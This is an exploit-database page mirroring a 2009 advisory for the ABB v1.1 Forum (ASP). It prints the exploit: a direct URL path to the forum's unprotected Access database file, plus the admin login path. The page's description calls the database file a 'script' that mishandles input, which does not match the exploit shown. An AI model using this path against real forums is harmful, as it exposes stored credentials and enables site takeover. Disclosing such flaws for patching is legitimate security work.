header-logo
Suggest Exploit
vendor:
ABB v1.1 Forum
by:
ViRuSMaN
9,3
CVSS
HIGH
Remote Database Disclosure
20
CWE
Product Name: ABB v1.1 Forum
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ABB v1.1 Forum Remote Database Disclosure Vulnerability

The vulnerability allows an attacker to access the remote database of the ABB v1.1 Forum. The vulnerability exists due to insufficient validation of user-supplied input in the 'fpdb/abb.mdb' script. A remote attacker can send a specially crafted HTTP request to the vulnerable script and gain access to the remote database.

Mitigation:

Update to the latest version of ABB v1.1 Forum.
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|


==============================================================================
        [»] ABB v1.1 Forum Remote Database Disclosure Vulnerability
==============================================================================

    [»] Script:             [ ABB Forums ]
    [»] Language:           [ ASP ]
    [»] Site page:          [ Possede de tres nombreuses options d administration et de configuration ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com  ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

    [»] http://server/[path]/fpdb/abb.mdb


===[ Admin Login ]===

    [»] http://server/[path]/admin.asp


Author: ViRuSMaN <-

###########################################################################

Navigation

Suggest Exploit

Services By CQR